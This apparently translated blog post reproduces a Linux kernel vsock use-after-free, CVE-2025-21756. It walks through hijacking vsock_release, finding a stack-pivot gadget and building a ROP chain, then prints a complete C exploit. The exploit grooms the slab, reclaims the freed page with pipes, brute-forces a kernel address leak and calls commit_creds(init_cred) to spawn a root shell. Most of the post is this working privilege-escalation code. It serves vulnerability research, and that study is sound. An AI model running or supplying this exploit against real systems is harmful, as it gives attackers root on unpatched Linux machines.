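Because the page holding vuln_vsk has been hijacked, the contents of the vuln_vsk structure are under our control. As with other control-flow hijacking approaches, vsk contains function pointers that get called; here the hijack goes through vsock_release.

[Screenshot: source of vsock_release]

sk->sk_prot->close is a call through two levels of pointers, so pointing a forged sk_prot at a structure that contains function pointers gives a call to a chosen function. The object picked here is raw_prot, whose function pointers include raw_abort:

[Screenshot: source of raw_abort]

As shown below, forging the sk->sk_error_report field therefore hijacks control flow.

[Screenshot: call to sk->sk_error_report]

Since the contents of sk are controlled, the first step after hijacking control flow is naturally a stack pivot. Debugging shows that when sk_error_report is called, both rbx and rdi point to the heap address of vuln_vsk, so a gadget such as push rbx ; pop rsp ; ret or push rdi ; pop rsp ; ret would do. In practice such clean gadgets are rare in the kernel (almost nonexistent), and neither ropper nor ROPgadget found one.

A note on how I looked for the pivot gadget. Since the two usual tools found nothing, I fell back to a cruder method: scan the kernel code segment for the byte sequence of push rbx ; pop rsp, 0x535C, and then manually filter the hits (68 in total) for a gadget that can actually complete the pivot.

[Screenshot: results of the byte-pattern scan]

The search settled on the gadget shown below. It contains a jb in the middle, so in a real run the jump could be taken and the trailing ret skipped. Testing showed that execution does reach the ret and completes the pivot, after which the ROP chain can be laid out to escalate privileges.

[Screenshot: disassembly of the chosen gadget]

The full ROP chain: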

// create the rop chain!
long deadbuf = 0;
write(pipes[i][1], &deadbuf, 8);
write(pipes[i][1], &deadbuf, 8);
write(pipes[i][1], &deadbuf, 8);
write(pipes[i][1], &deadbuf, 8);

write(pipes[i][1], &pop_r15_ret, 8); // junk
write(pipes[i][1], &raw_proto_abort, 8); // sk_prot (calls sk->sk_error_report())
write(pipes[i][1], &ret, 8);

// 0x18 bytes are added in total, so `write(pipes[i][1], buf, 0x18);` is not needed
write(pipes[i][1], &pop_rdi_ret, 8); // stack pivot target
write(pipes[i][1], &init_cred, 8);
write(pipes[i][1], &ret, 8);
// write(pipes[i][1], &ret, 8);

write(pipes[i][1], &commit_creds, 8); // commit_creds(init_cred);
write(pipes[i][1], &swapgs_restore_regs_and_return_to_usermode, 8);
write(pipes[i][1], &null_ptr, 8); // rax
write(pipes[i][1], &null_ptr, 8); // rdi
write(pipes[i][1], &shell, 8); // rip
write(pipes[i][1], &user_cs, 8);
write(pipes[i][1], &user_rflags, 8);
write(pipes[i][1], &user_rsp, 8); // rsp
write(pipes[i][1], &user_ss, 8);
// write(pipes[i][1], buf, 0x18);
write(pipes[i][1], &not, 8); // sk_lock
write(pipes[i][1], &not, 8); // sk_lock
write(pipes[i][1], &null_ptr, 8); // sk_lock
write(pipes[i][1], &null_ptr, 8); // sk_lock
write(pipes[i][1], buf, 0x200);
write(pipes[i][1], &push_rbx_pop_rsp_ret, 8); // stack pivot [sk_error_report()]

Final

The final result is shown below.

[Screenshot: final exploit run]

exp

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <fcntl.h>
#include <linux/kernel.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sched.h>
#include <linux/vm_sockets.h>
#include <assert.h>
#include <sys/msg.h>
#include <linux/netlink.h>
#include <linux/vm_sockets_diag.h>
#include <linux/sock_diag.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <stdint.h>
#include <ctype.h>

#define pause() {write(STDOUT_FILENO, "[*] Paused (press enter to continue)\n", 37); getchar();}
/*
CVE-2025-21756 Exploit
Michael Hoefler
4/18/2025
*/

#define MAX_PORT_RETRIES 24 /* net/vmw_vsock/af_vsock.c */
#define VMADDR_CID_NONEXISTING 42

// PINGv6
#define OBJS_PER_SLAB 12
#define CPU_PARTIAL 24
#define FLUSH ((OBJS_PER_SLAB) * (CPU_PARTIAL + 1))
#define PRE (OBJS_PER_SLAB - 1) * 10
#define POST (OBJS_PER_SLAB + 1) * 10

#define SIZE 1280
#define SPRAY_SIZE 1200
#define NUM_PIPES 500

#define BUFFER_SIZE 8192

#define PAGE_SIZE 4096

/* Create socket <type>, bind to <cid, port> and return the file descriptor. */
int vsock_bind(unsigned int cid, unsigned int port, int type)
{
struct sockaddr_vm sa = {
.svm_family = AF_VSOCK,
.svm_cid = cid,
.svm_port = port,
};
int fd;

fd = socket(AF_VSOCK, type, 0);
if (fd < 0) {
perror("socket");
exit(EXIT_FAILURE);
}

if (bind(fd, (struct sockaddr *)&sa, sizeof(sa))) {
perror("bind");
exit(EXIT_FAILURE);
}

return fd;
}

// this is a universal function to print binary data from a char* array
void print_binary(void *addr, int len)
{
size_t *buf64 = (size_t *) addr;
char *buf8 = (char *) addr;
for (int i = 0; i < len / 8; i += 2) {
printf(" %04x", i * 8);
for (int j = 0; j < 2; j++) {
i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf(" ");
}
printf(" ");
for (int j = 0; j < 16 && j + i * 8 < len; j++) {
printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
}
puts("");
}
}

// parse the socket information returned by the kernel
static void parse_diag_response(char *buf, int len) {
struct nlmsghdr *nlh;

for (nlh = (struct nlmsghdr *)buf; NLMSG_OK(nlh, len); nlh = NLMSG_NEXT(nlh, len)) {
if (nlh->nlmsg_type == NLMSG_ERROR) {
fprintf(stderr, "Netlink error\n");
exit(EXIT_FAILURE);
}

if (nlh->nlmsg_type == NLMSG_DONE)
break;

// extract the socket diagnostic information
struct vsock_diag_msg *diag = NLMSG_DATA(nlh);
printf("vsock_diag_msg content:\
\n state=%u, ino=%u,\n src_cid=0x%x, src_port=0x%x,\
\n dst_cid=0x%x, dst_port=0x%x\n",
diag->vdiag_state,
diag->vdiag_ino,
diag->vdiag_src_cid,
diag->vdiag_src_port,
diag->vdiag_dst_cid,
diag->vdiag_dst_port);
}
}

// get a shell
void get_shell(void){
puts("[*] Returned to userland");
if (getuid() == 0){
printf("[*] UID: %d, got root!\n", getuid());
__asm__(
"pop rdi;"
);
system("/bin/sh");
} else {
printf("[!] UID: %d, didn't get root\n", getuid());
exit(-1);
}
}

long get_user_rsp() {
long rsp;
__asm__ volatile("mov %%rsp, %0" : "=r"(rsp));
return rsp;
}

static int query_flag = 0;
int query_vsock_diag() {
int sock;
struct sockaddr_nl sa;
struct nlmsghdr *nlh;
struct vsock_diag_req req;
char buffer[BUFFER_SIZE];

// Create Netlink socket
sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG);
if (sock < 0) {
perror("socket");
exit(-1);
}

memset(&sa, 0, sizeof(sa));
sa.nl_family = AF_NETLINK;

// Prepare Netlink message
memset(&req, 0, sizeof(req));
req.sdiag_family = AF_VSOCK;
req.vdiag_states = (1 << 2);

nlh = (struct nlmsghdr *)buffer;
nlh->nlmsg_len = NLMSG_LENGTH(sizeof(req));
nlh->nlmsg_type = SOCK_DIAG_BY_FAMILY;
nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_DUMP;
nlh->nlmsg_seq = 1;
nlh->nlmsg_pid = getpid();

memcpy(NLMSG_DATA(nlh), &req, sizeof(req));

// Send request
//printf("sock: %d\n", sock);
if (sendto(sock, nlh, nlh->nlmsg_len, 0, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
perror("ERROR: sendto");
close(sock);
exit(-1);
}

// Receive response
ssize_t len = recv(sock, buffer, sizeof(buffer), 0);
if (len < 0) {
perror("ERROR: recv");
close(sock);
exit(-1);
}
if (!query_flag++) {
puts("[+]-------------------------------------------[+]");
print_binary(buffer, len);
parse_diag_response(buffer, len);
puts("[+]-------------------------------------------[+]");
}
close(sock);
return len;
}

void pin_cpu(int cpu) {
cpu_set_t set;
CPU_ZERO(&set);
CPU_SET(cpu, &set);
if (sched_setaffinity(0, sizeof(set), &set) == -1) {
perror("sched_setaffinity");
exit(1);
}
}

size_t user_cs, user_ss, user_rsp, user_rflags;
void save_status(void)
{
__asm__(
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_rsp, rsp;"
"pushf;"
"pop user_rflags;"
);
puts("[*] successful save status");
}

int main(void) {

int sockets[MAX_PORT_RETRIES];
struct sockaddr_vm addr;
int s, i, alen;

printf(
" _ \n"
" | | \n"
" __ _____ ___ ___| | ___ ____ ___ __ \n"
" \\ \\ / / __|/ _ \\ / __| |/ / '_ \\ \\ /\\ / / '_ \\ \n"
" \\ V /\\__ \\ (_) | (__| <| |_) \\ V V /| | | |\n"
" \\_/ |___/\\___/ \\___|_|\\_\\ .__/ \\_/\\_/ |_| |_|\n"
" | | \n"
" |_| \n");

puts("[+] pinning to cpu0");
pin_cpu(0);

save_status();

puts("[+] alloc enough sockets and prepare bind table");

int junk[FLUSH];
for (int i = 0; i < FLUSH; i++)
junk[i] = socket(AF_VSOCK, SOCK_SEQPACKET, 0);

s = vsock_bind(VMADDR_CID_LOCAL, VMADDR_PORT_ANY, SOCK_SEQPACKET);

alen = sizeof(addr);
if (getsockname(s, (struct sockaddr *)&addr, &alen)) {
perror("getsockname");
exit(EXIT_FAILURE);
}

struct sockaddr_vm sa = {
.svm_family = AF_VSOCK,
.svm_cid = VMADDR_CID_LOCAL,
.svm_port = addr.svm_port,
};

for (i = 0; i < MAX_PORT_RETRIES; ++i) {
sa.svm_port = ++addr.svm_port;
if (bind(junk[i], (struct sockaddr *)&sa, sizeof(sa))) {
perror("bind");
exit(EXIT_FAILURE);
}
}

close(s);

puts("[+] pre alloc sockets");

int pre[PRE];
for (int i = 0; i < PRE; i++)
pre[i] = socket(AF_VSOCK, SOCK_SEQPACKET, 0);

puts("[+] alloc target");
s = socket(AF_VSOCK, SOCK_STREAM, 0);
if (s < 0) {
perror("socket");
exit(EXIT_FAILURE);
}

// testing
puts("[+] post-alloc objects");
int post[POST];
for (int i = 0; i < POST; i++)
post[i] = socket(AF_VSOCK, SOCK_SEQPACKET, 0);


puts("[+] trigger uaf");
if (!connect(s, (struct sockaddr *)&addr, alen)) {
fprintf(stderr, "Unexpected connect() #1 success\n");
exit(EXIT_FAILURE);
}
// connect() #1 failed: transport set, sk in unbound list.

addr.svm_cid = VMADDR_CID_NONEXISTING;
addr.svm_port = VMADDR_PORT_ANY;
if (!connect(s, (struct sockaddr *)&addr, alen)) {
fprintf(stderr, "Unexpected connect() #2 success\n");
exit(EXIT_FAILURE);
}
// connect() #2 failed: transport unset, sk ref dropped?

// wait for input
puts("[+] uaf finished!..");


puts("[+] fill up the cpu partial list");
for (int i = 4; i < FLUSH; i += OBJS_PER_SLAB)
close(junk[i]);

puts("[+] free all the pre/post alloc-ed objects");
for (int i = 0; i < POST; i++)
close(post[i]);
for (int i = 0; i < PRE; i++)
close(pre[i]);

puts("[+] close the junk bound sockets");
for (int i = 0; i < FLUSH; i++)
close(junk[i]);

sleep(3);

int pipes[NUM_PIPES][2];
char page[PAGE_SIZE];
memset(page, 2, PAGE_SIZE);

puts("[+] reclaim page");
pause(); // debug final exploit (blocks until a signal is delivered)

int w = 0;
int j;
i = 0;
while (1) { // TODO: i < NUM_PIPES, improve stability

usleep(100000); // 0.1 s; sleep() takes whole seconds, so sleep(0.1) is sleep(0)

if (pipe(&pipes[i][0]) < 0) {
perror("pipe");
break;
}

w = 0;
while (w < PAGE_SIZE) {
ssize_t written = write(pipes[i][1], page, 8);
j = query_vsock_diag();
w += written;
if (j != 48) goto out;
}
printf(".");
fflush(stdout);
i++;
if (i % 32 == 0) puts("");
}

out:

printf("\n[+] found init_net at i=%d and w=%d\n", i, w);

//long base = 0xffffffff84bb0000; // probably need to change for aslr
long base = 0xffffffff84bb1000; // probably need to change for aslr
long off = 0;
long addy;
printf("[+] attempting net overwrite (aslr bypass).\n");

while (off < 0xffffffff) {

// release the page of vsk
close(pipes[i][0]);
close(pipes[i][1]);

if (pipe(&pipes[i][0]) < 0) {
perror("pipe");
}

addy = base + off;

write(pipes[i][1], page, w - 8);
write(pipes[i][1], &addy, 8); //position of sock_net(sk)

if (off % 256 == 0) {
printf("+");
fflush(stdout);
}

j = query_vsock_diag();
if (j == 48) {
printf("\n[*] LEAK init_net @ 0x%lx\n", base + off);
goto out2;
}

off += 128; // TODO: modify for aslr?

}

out2: ; // empty statement: before C23 a label cannot directly precede a declaration

long kern_base = base + off - 0x3bb1f80;
printf("[*] leaked kernel base @ 0x%lx\n", kern_base);

// calculate some rop gadgets
long ret = kern_base + 0x15e920 + 1;
// 0xffffffff8115e91f : pop r15 ; ret
long pop_r15_ret = kern_base + 0x15e91f;
// 0xffffffff8115e920 : pop rdi ; ret
long pop_rdi_ret = kern_base + 0x15e920;

// long raw_proto_abort = kern_base + 0x2efa8c0;
long raw_proto = kern_base + 0x2ef2400; // actually is raw_prot in kallsyms
long raw_proto_abort = raw_proto + 0x1c0; // the offset of raw_prot->diag_destroy(raw_abort)

// long null_ptr = kern_base + 0x2eeaee0;
long null_ptr = raw_proto + 0x10; // obtained from raw_prot struct


// 0xffffffff82c2a8ed: push rdi; pop rsp; cmp dword ptr [rax - 0x74bf5df6], 0x66b06741; ret;
// long push_rbx_pop_rsp_ret = kern_base + 0x6b9529;
long push_rbx_pop_rsp_ret = kern_base + 0xcbb984;
// replace `push rdi` with `push rbx` which I dont find in my kernel & rdi = rbx
long push_rdi_pop_rsp_ret = kern_base + 0x1c2a8ed;


long init_cred = kern_base + 0x2c74d80;
long commit_creds = kern_base + 0x1fcca0;
// return to user mode
// long swapgs_restore_regs_and_return_to_usermode = kern_base + 0x16011a6;
long swapgs_restore_regs_and_return_to_usermode = kern_base + 0x1601170 + 54; // +54 enters at the `mov rdi, rsp` instruction

// info for returning to usermode
// long user_cs = 0x33;
// long user_ss = 0x2b;
// long user_rflags = 0x202;
long shell = (long)get_shell;

// uint64_t* user_rsp = (uint64_t*)get_user_rsp();

//getchar();

printf("[+] writing the rop chain\n");

close(pipes[i][0]);
close(pipes[i][1]);

if (pipe(&pipes[i][0]) < 0) {
perror("pipe");
}

printf("[+] writing payload to vsk\n");
write(pipes[i][1], page, w - 56);

char buf[0x330];
memset(buf, 'A', 0x330);
char not[0x330];
memset(not, 0, 0x330);

// create the rop chain!
long deadbuf = 0;
write(pipes[i][1], &deadbuf, 8);
write(pipes[i][1], &deadbuf, 8);
write(pipes[i][1], &deadbuf, 8);
write(pipes[i][1], &deadbuf, 8);

write(pipes[i][1], &pop_r15_ret, 8); // junk
write(pipes[i][1], &raw_proto_abort, 8); // sk_prot (calls sk->sk_error_report())
write(pipes[i][1], &ret, 8);

// 0x18 bytes are added in total, so `write(pipes[i][1], buf, 0x18);` is not needed
write(pipes[i][1], &pop_rdi_ret, 8); // stack pivot target
write(pipes[i][1], &init_cred, 8);
write(pipes[i][1], &ret, 8);
// write(pipes[i][1], &ret, 8);

write(pipes[i][1], &commit_creds, 8); // commit_creds(init_cred);
write(pipes[i][1], &swapgs_restore_regs_and_return_to_usermode, 8);
write(pipes[i][1], &null_ptr, 8); // rax
write(pipes[i][1], &null_ptr, 8); // rdi
write(pipes[i][1], &shell, 8); // rip
write(pipes[i][1], &user_cs, 8);
write(pipes[i][1], &user_rflags, 8);
write(pipes[i][1], &user_rsp, 8); // rsp
write(pipes[i][1], &user_ss, 8);
// write(pipes[i][1], buf, 0x18);
write(pipes[i][1], &not, 8); // sk_lock
write(pipes[i][1], &not, 8); // sk_lock
write(pipes[i][1], &null_ptr, 8); // sk_lock
write(pipes[i][1], &null_ptr, 8); // sk_lock
write(pipes[i][1], buf, 0x200);
write(pipes[i][1], &push_rbx_pop_rsp_ret, 8); // stack pivot [sk_error_report()]
// write(pipes[i][1], &push_rdi_pop_rsp_ret, 8); // stack pivot [sk_error_report()]
//getchar();

close(s); // trigger the exploit!

}

Notes

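A few points about the exploitation part are worth noting:

  • The PoC only succeeds after a large number of page free-and-reclaim operations hit the target, so its success rate is low.
  • The address brute-forcing proposed in the original write-up also seems to me to be practical only when randomization is disabled. With KASLR enabled, the number of brute-force attempts grows, which raises the demands on page reclaim hits and tends to crash the kernel before the leak succeeds.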
  • Title: CVE-2025-21756 Vulnerability Reproduction and Exploitation
  • Author: henry
  • Created at : 2025-06-13 11:46:57
  • Updated at : 2025-06-13 12:00:04
  • Link: https://henrymartin262.github.io/2025/06/13/CVE-2025-21756/
  • License: This work is licensed under CC BY-NC-SA 4.0.